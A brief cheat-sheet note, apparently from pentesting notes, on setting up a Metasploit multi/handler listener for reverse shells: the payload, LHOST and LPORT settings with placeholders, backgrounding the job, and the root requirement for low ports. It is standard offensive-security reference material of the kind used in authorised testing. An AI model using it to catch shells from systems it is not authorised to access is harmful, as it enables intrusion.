# metasploit reverse shell ```use multi/handler``` ```sh set PAYLOAD <payload> set LHOST <listen-address> set LPORT <liste-port> exploit -j ``` * multi/handler is backgrounded. Therefore, `session 1` foregrounds the session. * __LPORT under 1024__ user must be root or use sudo